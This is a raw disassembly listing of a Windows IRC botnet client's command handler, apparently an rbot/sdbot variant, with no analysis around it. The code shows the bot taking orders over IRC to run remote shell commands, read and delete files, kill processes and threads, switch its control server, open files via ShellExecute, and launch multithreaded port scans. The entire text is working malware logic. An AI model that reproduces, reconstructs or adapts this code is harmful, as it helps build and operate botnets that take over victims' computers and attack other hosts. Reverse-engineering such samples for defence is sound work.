jmp short loc_40BD0D
; ---------------------------------------------------------------------------
loc_40BD7C: ; CODE XREF: sub_408A18+20C0�j
; sub_408A18+20D4�j
push [ebp+var_10]
lea eax, [ebp+var_2F0]
push offset aNickS ; "NICK %s"
push eax
call sub_4145E5
mov esi, [ebp+var_C]
push esi
call sub_414972
add esp, 10h
test eax, eax
jle loc_40E538
push esi
call sub_414972
cmp eax, 1F4h
pop ecx
jge loc_40E538
lea eax, [ebp+var_2F0]
push eax
push offset aS_5 ; "%s\r\n"
push esi
call sub_414972
imul eax, 234h
pop ecx
push dword_43668C[eax]
call sub_4056B0
push [ebp+var_10]
push esi
push offset aCloneNickSS ; "[CLONE]: Nick (%s): %s"
loc_40BDE3: ; CODE XREF: sub_408A18+3456�j
; sub_408A18+34C5�j ...
call sub_401F73
jmp loc_40D37F
; ---------------------------------------------------------------------------
loc_40BDED: ; CODE XREF: sub_408A18+2098�j
; sub_408A18+20AC�j
cmp [ebp+var_14], 0
jz loc_40E538
push [ebp+var_10]
push [ebp+var_14]
call sub_4150B0
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_40BE1F
push esi
lea eax, [ebp+var_2F0]
push offset aModeS ; "MODE %s"
push eax
call sub_4145E5
add esp, 0Ch
loc_40BE1F: ; CODE XREF: sub_408A18+33F0�j
mov edi, [ebp+var_C]
push edi
call sub_414972
test eax, eax
pop ecx
jle loc_40E538
push edi
call sub_414972
cmp eax, 1F4h
pop ecx
jge loc_40E538
lea eax, [ebp+var_2F0]
push eax
push offset aS_5 ; "%s\r\n"
push edi
call sub_414972
imul eax, 234h
pop ecx
push dword_43668C[eax]
call sub_4056B0
push esi
push edi
push offset aCloneModeSS ; "[CLONE]: Mode (%s): %s"
jmp loc_40BDE3
; ---------------------------------------------------------------------------
loc_40BE73: ; CODE XREF: sub_408A18+2070�j
; sub_408A18+2084�j
cmp [ebp+var_14], 0
jz loc_40E538
push [ebp+var_10]
push [ebp+var_14]
call sub_4150B0
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40E538
mov edi, [ebp+var_C]
push edi
call sub_414972
test eax, eax
pop ecx
jle loc_40E538
push edi
call sub_414972
cmp eax, 1F4h
pop ecx
jge loc_40E538
push esi
push offset aS_5 ; "%s\r\n"
push edi
call sub_414972
imul eax, 234h
pop ecx
push dword_43668C[eax]
call sub_4056B0
push esi
push edi
push offset aCloneRawSS ; "[CLONE]: Raw (%s): %s"
jmp loc_40BDE3
; ---------------------------------------------------------------------------
loc_40BEE2: ; CODE XREF: sub_408A18+2048�j
; sub_408A18+205C�j
cmp [ebp+var_14], 0
jz loc_40E538
push [ebp+var_C]
push [ebp+var_14]
call sub_4150B0
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40E538
push esi
push offset aModeS_0 ; "MODE %s\r\n"
push [ebp+arg_4]
call sub_4056B0
push esi
push offset aMainModeChange ; "[MAIN]: Mode change: %s"
jmp loc_40C7AD
; ---------------------------------------------------------------------------
loc_40BF1C: ; CODE XREF: sub_408A18+2020�j
; sub_408A18+2034�j
mov edi, [ebp+var_A4]
push 4
mov esi, offset dword_427964
pop ecx
xor eax, eax
repe cmpsb
jz loc_408C96
push [ebp+var_10]
push offset aPartS ; "PART %s\r\n"
push [ebp+arg_4]
call sub_4056B0
push [ebp+var_C]
call sub_414972
imul eax, 3E8h
add esp, 10h
push eax
call ds:dword_420000 ; Sleep
push [ebp+ebx+var_9C]
push [ebp+var_10]
push offset aJoinSS_0 ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_4056B0
push offset aMainCycle_ ; "[MAIN]: Cycle."
call sub_401EFF
jmp loc_40C7B2
; ---------------------------------------------------------------------------
loc_40BF82: ; CODE XREF: sub_408A18+1FF8�j
; sub_408A18+200C�j
cmp [ebp+var_14], 0
jz loc_40E538
lea edx, [eax+1]
loc_40BF8F: ; CODE XREF: sub_408A18+357C�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40BF8F
sub eax, edx
mov ecx, eax
mov eax, [ebp+var_C]
lea esi, [eax+1]
loc_40BFA0: ; CODE XREF: sub_408A18+358D�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40BFA0
push [ebp+var_10]
sub eax, esi
add eax, ecx
mov ecx, [ebp+var_14]
lea eax, [eax+ecx+2]
push eax
call sub_4150B0
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40E538
push esi
lea eax, [ebp+var_2F0]
push offset dword_426F84
push eax
call sub_4145E5
push 0
push 0
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_C]
push [ebp+arg_4]
call sub_4056FB
push esi
push [ebp+var_C]
push offset aMainActionSS_ ; "[MAIN]: Action: %s: %s."
call sub_401F73
add esp, 2Ch
jmp loc_40E538
; ---------------------------------------------------------------------------
loc_40C005: ; CODE XREF: sub_408A18+1FD0�j
; sub_408A18+1FE4�j
cmp [ebp+var_14], 0
jz loc_40E538
lea edx, [eax+1]
loc_40C012: ; CODE XREF: sub_408A18+35FF�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40C012
sub eax, edx
mov ecx, eax
mov eax, [ebp+var_C]
lea esi, [eax+1]
loc_40C023: ; CODE XREF: sub_408A18+3610�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40C023
push [ebp+var_10]
sub eax, esi
add eax, ecx
mov ecx, [ebp+var_14]
lea eax, [eax+ecx+2]
push eax
call sub_4150B0
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40E538
push 0
push 0
push esi
push [ebp+var_C]
push [ebp+arg_4]
call sub_4056FB
push esi
push [ebp+var_C]
push offset aMainPrivmsgSS_ ; "[MAIN]: Privmsg: %s: %s."
call sub_401F73
loc_40C068: ; CODE XREF: sub_408A18+56F9�j
add esp, 20h
jmp loc_40E538
; ---------------------------------------------------------------------------
loc_40C070: ; CODE XREF: sub_408A18+1FA8�j
; sub_408A18+1FBC�j
cmp [ebp+var_14], 0
jz loc_408C96
push [ebp+var_10]
push [ebp+var_14]
call sub_4150B0
test eax, eax
pop ecx
pop ecx
jz loc_408C96
push eax
push [ebp+var_C]
call sub_401DEF
push [ebp+var_C]
lea eax, [ebp+var_2F0]
push offset aMainAliasAdded ; "[MAIN]: Alias added: %s."
push eax
call sub_4145E5
add esp, 14h
loc_40C0AF: ; CODE XREF: sub_408A18+3C86�j
; sub_408A18+50B9�j
cmp [ebp+var_8], 0
jnz short loc_40C0D2
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056FB
add esp, 14h
loc_40C0D2: ; CODE XREF: sub_408A18+369B�j
; sub_408A18+4871�j ...
lea eax, [ebp+var_2F0]
push eax
call sub_401EFF
jmp loc_40E6F7
; ---------------------------------------------------------------------------
loc_40C0E3: ; CODE XREF: sub_408A18+1E68�j
; sub_408A18+1E7C�j
push [ebp+var_C]
push [ebp+arg_1C]
call sub_4150B0
test eax, eax
pop ecx
pop ecx
jz loc_40E538
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
jz short loc_40C17E
push ebx
push [ebp+var_14]
call sub_4150B0
mov esi, eax
test esi, esi
pop ecx
pop ecx
lea eax, [ebp+var_2F0]
jz short loc_40C16C
push esi
push [ebp+var_A0]
push [ebp+var_A4]
push [ebp+var_A8]
push offset aSSSS ; "%s %s %s :%s"
push eax
call sub_4145E5
push 1FFh
lea eax, [ebp+var_2F0]
push eax
push [ebp+arg_0]
call sub_414670
push esi
push [ebp+var_C]
lea eax, [ebp+var_2F0]
push offset aMainGethostSCo ; "[MAIN]: Gethost: %s, Command: %s"
push eax
call sub_4145E5
add esp, 34h
inc [ebp+arg_24]
jmp loc_40C31F
; ---------------------------------------------------------------------------
loc_40C16C: ; CODE XREF: sub_408A18+3700�j
push offset aMainUnableToEx ; "[MAIN]: Unable to extract Gethost comma"...
push eax
call sub_4145E5
pop ecx
pop ecx
jmp loc_40C31F
; ---------------------------------------------------------------------------
loc_40C17E: ; CODE XREF: sub_408A18+36E9�j
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_4119C3
add esp, 0Ch
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056FB
push [ebp+var_C]
lea eax, [ebp+var_2F0]
push offset aMainGethostS_ ; "[MAIN]: Gethost: %s."
push 200h
push eax
call sub_41483D
add esp, 24h
jmp loc_40C31F
; ---------------------------------------------------------------------------
loc_40C1C8: ; CODE XREF: sub_408A18+1B97�j
; sub_408A18+1BAB�j
push offset aR ; "r"
push [ebp+var_C]
call sub_414DC3
mov edi, eax
test edi, edi
pop ecx
pop ecx
lea eax, [ebp+var_2F0]
jz short loc_40C246
push edi
mov esi, 200h
push esi
push eax
call sub_415E55
add esp, 0Ch
jmp short loc_40C220
; ---------------------------------------------------------------------------
loc_40C1F5: ; CODE XREF: sub_408A18+380A�j
push 1
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056FB
push edi
lea eax, [ebp+var_2F0]
push esi
push eax
call sub_415E55
add esp, 20h
loc_40C220: ; CODE XREF: sub_408A18+37DB�j
test eax, eax
jnz short loc_40C1F5
push edi
call sub_4149C3
push [ebp+var_C]
lea eax, [ebp+var_2F0]
push offset aMainReadFileCo ; "[MAIN]: Read file complete: %s"
push eax
call sub_4145E5
add esp, 10h
jmp loc_40C31F
; ---------------------------------------------------------------------------
loc_40C246: ; CODE XREF: sub_408A18+37C9�j
push [ebp+var_C]
push offset aMainReadFileFa ; "[MAIN]: Read file failed: %s"
loc_40C24E: ; CODE XREF: sub_408A18+32D1�j
push eax
call sub_4145E5
add esp, 0Ch
jmp loc_40C2FC
; ---------------------------------------------------------------------------
loc_40C25C: ; CODE XREF: sub_408A18+1B6F�j
; sub_408A18+1B83�j
cmp [ebp+var_14], 0
jz loc_40E538
push [ebp+var_C]
push [ebp+var_14]
call sub_4150B0
mov ebx, eax
test ebx, ebx
pop ecx
pop ecx
jz loc_40E538
mov edi, ebx
dec edi
loc_40C280: ; CODE XREF: sub_408A18+386E�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_40C280
mov esi, offset asc_4216D8 ; "\n"
push ebx
movsw
call sub_40F0C3
test eax, eax
pop ecx
lea eax, [ebp+var_2F0]
jnz short loc_40C2A7
push offset aCmdErrorSendin ; "[CMD]: Error sending to remote shell."
jmp short loc_40C2F4
; ---------------------------------------------------------------------------
loc_40C2A7: ; CODE XREF: sub_408A18+3886�j
push ebx
push offset aCmdCommandsS ; "[CMD]: Commands: %s"
push eax
call sub_4145E5
add esp, 0Ch
jmp short loc_40C31F
; ---------------------------------------------------------------------------
loc_40C2B8: ; CODE XREF: sub_408A18+1B47�j
; sub_408A18+1B5B�j
cmp [ebp+var_14], 0
jz loc_40E538
push [ebp+var_C]
push [ebp+var_14]
call sub_4150B0
test eax, eax
pop ecx
pop ecx
jz loc_40E538
push eax
call sub_4068EB
test eax, eax
pop ecx
lea eax, [ebp+var_2F0]
jnz short loc_40C2EF
push offset aMircClientNotO ; "[mIRC]: Client not open."
jmp short loc_40C2F4
; ---------------------------------------------------------------------------
loc_40C2EF: ; CODE XREF: sub_408A18+38CE�j
push offset aMircCommandSen ; "[mIRC]: Command sent."
loc_40C2F4: ; CODE XREF: sub_408A18+1C69�j
; sub_408A18+1C73�j ...
push eax
call sub_4145E5
pop ecx
pop ecx
loc_40C2FC: ; CODE XREF: sub_408A18+1BE4�j
; sub_408A18+1C41�j ...
cmp [ebp+var_8], 0
jnz short loc_40C31F
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056FB
add esp, 14h
loc_40C31F: ; CODE XREF: sub_408A18+374F�j
; sub_408A18+3761�j ...
lea eax, [ebp+var_2F0]
push eax
call sub_401EFF
pop ecx
jmp loc_40E538
; ---------------------------------------------------------------------------
loc_40C331: ; CODE XREF: sub_408A18+1B1F�j
; sub_408A18+1B33�j
push 0
push [ebp+var_A0]
push [ebp+arg_4]
push [ebp+var_C]
call sub_4041E2
push [ebp+var_C]
push offset aFileListS ; "[FILE]: List: %s"
jmp loc_40BDE3
; ---------------------------------------------------------------------------
loc_40C351: ; CODE XREF: sub_408A18+1AF7�j
; sub_408A18+1B0B�j
push 20h
push [ebp+var_C]
call ds:dword_4200CC ; SetFileAttributesA
push [ebp+var_C]
call ds:dword_4200E4 ; DeleteFileA
test eax, eax
jz short loc_40C373
push [ebp+var_C]
push offset aFileDeletedS_0 ; "[FILE]: Deleted '%s'."
jmp short loc_40C37E
; ---------------------------------------------------------------------------
loc_40C373: ; CODE XREF: sub_408A18+394F�j
push offset aFile ; "[FILE]:"
call sub_406826
push eax
loc_40C37E: ; CODE XREF: sub_408A18+3959�j
lea eax, [ebp+var_2F0]
push 200h
push eax
call sub_41483D
loc_40C38F: ; CODE XREF: sub_408A18+3ABA�j
add esp, 10h
loc_40C392: ; CODE XREF: sub_408A18+3AD2�j
; sub_408A18+4F2E�j
cmp [ebp+var_8], 0
jnz loc_40A140
push 0
jmp loc_40A125
; ---------------------------------------------------------------------------
loc_40C3A3: ; CODE XREF: sub_408A18+1ACF�j
; sub_408A18+1AE3�j
push [ebp+var_C]
call sub_414972
push eax
call sub_4085E4
xor esi, esi
pop ecx
inc esi
pop ecx
push [ebp+var_C]
cmp eax, esi
lea eax, [ebp+var_2F0]
jnz short loc_40C3CA
push offset aProcProcessKil ; "[PROC]: Process killed ID: %s"
jmp short loc_40C3CF
; ---------------------------------------------------------------------------
loc_40C3CA: ; CODE XREF: sub_408A18+39A9�j
push offset aProcFailedToTe ; "[PROC]: Failed to terminate process ID:"...
loc_40C3CF: ; CODE XREF: sub_408A18+39B0�j
push eax
call sub_4145E5
add esp, 0Ch
cmp [ebp+var_8], 0
jnz loc_40A143
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056FB
add esp, 14h
jmp loc_40A143
; ---------------------------------------------------------------------------
loc_40C404: ; CODE XREF: sub_408A18+1AA7�j
; sub_408A18+1ABB�j
push 1
xor esi, esi
push esi
push esi
push [ebp+var_C]
push [ebp+var_4]
push [ebp+var_A0]
push [ebp+arg_4]
call sub_408206
add esp, 1Ch
cmp eax, 1
jnz short loc_40C43D
push [ebp+var_C]
push offset aProcProcessK_0 ; "[PROC]: Process killed & deleted: %s"
loc_40C42E: ; CODE XREF: sub_408A18+2C47�j
lea eax, [ebp+var_2F0]
loc_40C434: ; CODE XREF: sub_408A18+2F99�j
; sub_408A18+3A5E�j ...
push eax
call sub_4145E5
add esp, 0Ch
loc_40C43D: ; CODE XREF: sub_408A18+2C5C�j
; sub_408A18+2F3D�j ...
cmp [ebp+var_8], esi
jnz loc_40A140
push esi
jmp loc_40A125
; ---------------------------------------------------------------------------
loc_40C44C: ; CODE XREF: sub_408A18+1A7F�j
; sub_408A18+1A93�j
xor esi, esi
push esi
push esi
push esi
push [ebp+var_C]
push [ebp+var_4]
push esi
push [ebp+arg_4]
call sub_408206
add esp, 1Ch
push [ebp+var_C]
cmp eax, 1
lea eax, [ebp+var_2F0]
jnz short loc_40C478
push offset aProcProcessK_1 ; "[PROC]: Process killed: %s"
jmp short loc_40C434
; ---------------------------------------------------------------------------
loc_40C478: ; CODE XREF: sub_408A18+3A57�j
push offset aProcFailedTo_0 ; "[PROC]: Failed to terminate process: %s"...
jmp short loc_40C434
; ---------------------------------------------------------------------------
loc_40C47F: ; CODE XREF: sub_408A18+1A57�j
; sub_408A18+1A6B�j
mov esi, [ebp+var_C]
push esi
call dword_43585C ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_40C4A7
push 2
push 4
lea eax, [ebp+arg_0]
push eax
call dword_4358D8 ; gethostbyaddr
test eax, eax
jz short loc_40C4D7
push dword ptr [eax]
jmp short loc_40C4C0
; ---------------------------------------------------------------------------
loc_40C4A7: ; CODE XREF: sub_408A18+3A77�j
push esi
call dword_435848 ; gethostbyname
test eax, eax
jz short loc_40C4D7
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax]
call dword_435868 ; inet_ntoa
push eax
loc_40C4C0: ; CODE XREF: sub_408A18+3A8D�j
push esi
lea eax, [ebp+var_2F0]
push offset aDnsLookupSS_ ; "[DNS]: Lookup: %s -> %s."
push eax
call sub_4145E5
jmp loc_40C38F
; ---------------------------------------------------------------------------
loc_40C4D7: ; CODE XREF: sub_408A18+3A89�j
; sub_408A18+3A98�j
lea eax, [ebp+var_2F0]
push offset aDnsCouldnTReso ; "[DNS]: Couldn't resolve hostname."
push eax
call sub_4145E5
pop ecx
pop ecx
jmp loc_40C392
; ---------------------------------------------------------------------------
loc_40C4EF: ; CODE XREF: sub_408A18+1A2F�j
; sub_408A18+1A43�j
push 7Fh
push [ebp+var_C]
push [ebp+arg_14]
call sub_414670
push [ebp+var_C]
lea eax, [ebp+var_2F0]
push offset aMainServerChan ; "[MAIN]: Server changed to: '%s'."
push eax
call sub_4145E5
add esp, 18h
jmp loc_40DA0E
; ---------------------------------------------------------------------------
loc_40C518: ; CODE XREF: sub_408A18+1A07�j
; sub_408A18+1A1B�j
push 5
xor esi, esi
push esi
push esi
push [ebp+var_C]
push offset aOpen ; "open"
push esi
call dword_4358F0 ; ShellExecuteA
push [ebp+var_C]
test eax, eax
lea eax, [ebp+var_2F0]
jz short loc_40C544
push offset aShellFileOpene ; "[SHELL]: File opened: %s"
jmp loc_40C434
; ---------------------------------------------------------------------------
loc_40C544: ; CODE XREF: sub_408A18+3B20�j
push offset aShellCouldnTOp ; "[SHELL]: Couldn't open file: %s"
jmp loc_40C434
; ---------------------------------------------------------------------------
loc_40C54E: ; CODE XREF: sub_408A18+19DF�j
; sub_408A18+19F3�j
mov eax, [ebp+var_C]
mov cl, [eax]
mov byte_42BED0, cl
movsx eax, byte ptr [eax]
push eax
push offset aMainPrefixChan ; "[MAIN]: Prefix changed to: '%c'."
jmp loc_40D9FF
; ---------------------------------------------------------------------------
loc_40C567: ; CODE XREF: sub_408A18+19B7�j
; sub_408A18+19CB�j
push [ebp+var_C]
call sub_414972
test eax, eax
pop ecx
jle loc_40E538
push [ebp+var_C]
call sub_414972
cmp eax, 1F4h
pop ecx
jge loc_40E538
push 0
push 0
lea eax, [ebp+var_C8]
push 2
push eax
call sub_40FD06
push eax
lea eax, [ebp+var_2F0]
push offset aNickS ; "NICK %s"
push eax
call sub_4145E5
add esp, 1Ch
jmp loc_40BD29
; ---------------------------------------------------------------------------
loc_40C5B8: ; CODE XREF: sub_408A18+198F�j
; sub_408A18+19A3�j
mov edi, [ebp+var_C]
push edi
call sub_414972
test eax, eax
pop ecx
jle loc_408C96
push edi
call sub_414972
mov esi, 1F4h
cmp eax, esi
pop ecx
jge loc_408C96
push offset aQuitLater ; "QUIT :later\r\n"
push edi
call sub_414972
imul eax, 234h
pop ecx
push dword_43668C[eax]
call sub_4056B0
pop ecx
pop ecx
push esi
call ds:dword_420000 ; Sleep
push edi
call sub_414972
imul eax, 234h
pop ecx
push dword_43668C[eax]
call dword_4358F4 ; closesocket
push [ebp+var_18]
push edi
call sub_414972
imul eax, 234h
pop ecx
push dword_436694[eax]
call ds:dword_4200F0 ; TerminateThread
push edi
call sub_414972
imul eax, 234h
and dword_436694[eax], 0
push edi
call sub_414972
imul eax, 234h
and byte ptr dword_436480[eax], 0
pop ecx
pop ecx
jmp loc_408C96
; ---------------------------------------------------------------------------
loc_40C666: ; CODE XREF: sub_408A18+1967�j
; sub_408A18+197B�j
mov edi, [ebp+var_C]
push 4
mov esi, offset aAll ; "all"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40C6A3
call sub_4125E2
test eax, eax
jle short loc_40C68B
push eax
push offset aThreadsStopped ; "[THREADS]: Stopped: %d thread(s)."
jmp loc_40DAC2
; ---------------------------------------------------------------------------
loc_40C68B: ; CODE XREF: sub_408A18+3C66�j
push offset aThreadsNoActiv ; "[THREADS]: No active threads found."
loc_40C690: ; CODE XREF: sub_408A18+467A�j
; sub_408A18+4699�j ...
lea eax, [ebp+var_2F0]
push eax
call sub_4145E5
pop ecx
pop ecx
jmp loc_40C0AF
; ---------------------------------------------------------------------------
loc_40C6A3: ; CODE XREF: sub_408A18+3C5D�j
mov edi, [ebp+var_20]
jmp short loc_40C715
; ---------------------------------------------------------------------------
loc_40C6A8: ; CODE XREF: sub_408A18+3D01�j
mov esi, [ebp+edi*4+var_A8]
test esi, esi
jz loc_408C96
push esi
call sub_414972
push eax
call sub_41255A
pop ecx
pop ecx
test eax, eax
push esi
lea eax, [ebp+var_2F0]
jz short loc_40C6D7
push offset aThreadsKilledT ; "[THREADS]: Killed thread: %s."
jmp short loc_40C6DC
; ---------------------------------------------------------------------------
loc_40C6D7: ; CODE XREF: sub_408A18+3CB6�j
push offset aThreadsFailedT ; "[THREADS]: Failed to kill thread: %s."
loc_40C6DC: ; CODE XREF: sub_408A18+3CBD�j
push eax
call sub_4145E5
add esp, 0Ch
cmp [ebp+var_8], 0
jnz short loc_40C708
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056FB
add esp, 14h
loc_40C708: ; CODE XREF: sub_408A18+3CD1�j
lea eax, [ebp+var_2F0]
push eax
call sub_401EFF
pop ecx
loc_40C715: ; CODE XREF: sub_408A18+3C8E�j
inc edi
cmp edi, 20h
jb short loc_40C6A8
jmp loc_408C96
; ---------------------------------------------------------------------------
loc_40C720: ; CODE XREF: sub_408A18+193F�j
; sub_408A18+1953�j
cmp [ebp+var_14], 0
jz loc_40E538
push [ebp+var_C]
push [ebp+var_14]
call sub_4150B0
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40E538
push esi
push offset aS_5 ; "%s\r\n"
push [ebp+arg_4]
call sub_4056B0
push esi
push offset aMainIrcRawS_ ; "[MAIN]: IRC Raw: %s."
jmp short loc_40C7AD
; ---------------------------------------------------------------------------
loc_40C757: ; CODE XREF: sub_408A18+1917�j
; sub_408A18+192B�j
push [ebp+var_C]
push offset aPartS ; "PART %s\r\n"
push [ebp+arg_4]
call sub_4056B0
push [ebp+var_C]
push offset aMainPartedChan ; "[MAIN]: Parted channel: '%s'."
jmp short loc_40C7AD
; ---------------------------------------------------------------------------
loc_40C771: ; CODE XREF: sub_408A18+18EF�j
; sub_408A18+1903�j
push [ebp+ebx+var_A0]
push [ebp+var_C]
push offset aJoinSS_0 ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_4056B0
push [ebp+var_C]
push offset aMainJoinedCh_0 ; "[MAIN]: Joined channel: '%s'."
jmp loc_40BDE3
; ---------------------------------------------------------------------------
loc_40C795: ; CODE XREF: sub_408A18+18C7�j
; sub_408A18+18DB�j
push [ebp+var_C]
push offset aNickS_0 ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_4056B0
push [ebp+var_C]
push offset aMainNickChange ; "[MAIN]: Nick changed to: '%s'."
loc_40C7AD: ; CODE XREF: sub_408A18+34FF�j
; sub_408A18+3D3D�j ...
call sub_401F73
loc_40C7B2: ; CODE XREF: sub_408A18+3565�j
add esp, 14h
jmp loc_40E538
; ---------------------------------------------------------------------------
loc_40C7BA: ; CODE XREF: sub_408A18+188D�j
; sub_408A18+18A1�j
mov cl, byte_42B22A
and [ebp+arg_0], 0
test cl, cl
mov edx, offset byte_42B22A
jz loc_408C96
mov eax, edx
loc_40C7D3: ; CODE XREF: sub_408A18+3DC4�j
inc [ebp+arg_0]
add eax, 0Bh
cmp byte ptr [eax], 0
jnz short loc_40C7D3
test cl, cl
jz loc_408C96
mov [ebp+var_1C], edx
loc_40C7E9: ; CODE XREF: sub_408A18+40A2�j
push 9
call sub_412661
pop ecx
mov ecx, eax
mov eax, 190h
cdq
idiv [ebp+arg_0]
add eax, ecx
cmp eax, 258h
jle short loc_40C839
push ecx
lea eax, [ebp+var_2F0]
push offset aScanAlreadyDSc ; "[SCAN]: Already %d scanning threads. To"...
push eax
call sub_4145E5
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056FB
add esp, 20h
jmp loc_40CAB0
; ---------------------------------------------------------------------------
loc_40C839: ; CODE XREF: sub_408A18+3DEB�j
or [ebp+var_4D8], 0FFFFFFFFh
xor esi, esi
cmp dword_42B068, esi
mov [ebp+var_4DC], 0C8h
mov [ebp+var_4F0], 5
mov [ebp+var_4EC], esi
mov [ebp+arg_0], esi
jz short loc_40C8CC
mov edx, [ebp+var_1C]
add edx, 0FFFFFFF6h
mov edi, offset dword_42B068
loc_40C872: ; CODE XREF: sub_408A18+3E96�j
mov esi, edx
lea eax, [edi-28h]
loc_40C877: ; CODE XREF: sub_408A18+3E7B�j
mov bl, [eax]
mov cl, bl
cmp bl, [esi]
jnz short loc_40C89B
test cl, cl
jz short loc_40C895
mov bl, [eax+1]
mov cl, bl
cmp bl, [esi+1]
jnz short loc_40C89B
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_40C877
loc_40C895: ; CODE XREF: sub_408A18+3E69�j
xor esi, esi
xor eax, eax
jmp short loc_40C8A2
; ---------------------------------------------------------------------------
loc_40C89B: ; CODE XREF: sub_408A18+3E65�j
; sub_408A18+3E73�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
xor esi, esi
loc_40C8A2: ; CODE XREF: sub_408A18+3E81�j
cmp eax, esi
jz short loc_40C8B2
inc [ebp+arg_0]
add edi, 3Ch
cmp [edi], esi
jnz short loc_40C872
jmp short loc_40C8CC
; ---------------------------------------------------------------------------
loc_40C8B2: ; CODE XREF: sub_408A18+3E8C�j
mov eax, [ebp+arg_0]
mov ecx, eax
imul ecx, 3Ch
mov ecx, dword_42B068[ecx]
mov [ebp+var_4F4], ecx
mov [ebp+var_4D8], eax
loc_40C8CC: ; CODE XREF: sub_408A18+3E4D�j
; sub_408A18+3E98�j
cmp [ebp+var_4F4], esi
jz loc_40CAD7
push 10h
pop esi
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_D8]
push eax
push [ebp+arg_4]
mov [ebp+var_28], esi
call dword_435760 ; getsockname
mov al, [ebp+var_45B]
neg al
push esi
sbb eax, eax
and eax, 0FFFF0100h
add eax, 0FFFFh
and [ebp+var_D4], eax
push [ebp+var_D4]
call dword_435868 ; inet_ntoa
push eax
lea eax, [ebp+var_68C]
push eax
call sub_414670
xor eax, eax
cmp [ebp+var_45B], al
push 30h
setnz al
inc eax
inc eax
mov esi, eax
lea eax, [ebp+var_68C]
push eax
call sub_414640
add esp, 14h
xor bl, bl
test esi, esi
jle short loc_40C96C
loc_40C94C: ; CODE XREF: sub_408A18+3F52�j
test eax, eax
jz short loc_40C96C
mov byte ptr [eax], 78h
lea eax, [ebp+var_68C]
push 30h
push eax
call sub_414640
pop ecx
inc bl
pop ecx
movsx ecx, bl
cmp ecx, esi
jl short loc_40C94C
loc_40C96C: ; CODE XREF: sub_408A18+3F32�j
; sub_408A18+3F36�j
mov eax, [ebp+arg_4]
push [ebp+var_A0]
mov [ebp+var_4F8], eax
mov eax, [ebp+var_4]
mov [ebp+var_4D0], eax
mov eax, [ebp+var_8]
mov [ebp+var_4CC], eax
mov ebx, 80h
lea eax, [ebp+var_5F8]
push ebx
push eax
mov [ebp+var_4C8], 1
call sub_41483D
xor ecx, ecx
add esp, 0Ch
mov eax, offset aMurders ; "#murders"
inc ecx
mov edi, 420AEAh
mov esi, eax
xor edx, edx
repe cmpsb
jz short loc_40C9D4
push eax
lea eax, [ebp+var_578]
push ebx
push eax
call sub_41483D
add esp, 0Ch
jmp short loc_40C9DB
; ---------------------------------------------------------------------------
loc_40C9D4: ; CODE XREF: sub_408A18+3FA7�j
and [ebp+var_578], 0
loc_40C9DB: ; CODE XREF: sub_408A18+3FBA�j
xor esi, esi
cmp [ebp+var_4C8], esi
mov eax, offset aRandom ; "Random"
jnz short loc_40C9EF
mov eax, offset aSequential ; "Sequential"
loc_40C9EF: ; CODE XREF: sub_408A18+3FD0�j
push [ebp+var_4DC]
lea ecx, [ebp+var_68C]
push [ebp+var_4EC]
push [ebp+var_4F0]
push [ebp+var_4F4]
push ecx
push eax
lea eax, [ebp+var_2F0]
push offset aScanSPortScanS ; "[SCAN]: %s Port Scan started on %s:%d w"...
push eax
call sub_4145E5
push esi
lea eax, [ebp+var_2F0]
push 9
push eax
call sub_412471
add esp, 2Ch
mov [ebp+var_4E8], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_68C]
push eax
push offset sub_401B9D
push esi
push esi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_4E8]
imul ecx, 234h
cmp eax, esi
mov dword_436694[ecx], eax
jnz short loc_40CACD
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2F0]
push offset aScanFailedTo_0 ; "[SCAN]: Failed to start scan thread, er"...
push eax
call sub_4145E5
add esp, 0Ch
loc_40CA82: ; CODE XREF: sub_408A18+40BD�j
cmp [ebp+var_8], esi
jnz short loc_40CAA3
push esi
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056FB
add esp, 14h
loc_40CAA3: ; CODE XREF: sub_408A18+406D�j
lea eax, [ebp+var_2F0]
push eax
call sub_401EFF
pop ecx
loc_40CAB0: ; CODE XREF: sub_408A18+3E1C�j
add [ebp+var_1C], 0Bh
mov eax, [ebp+var_1C]
cmp byte ptr [eax], 0
jnz loc_40C7E9
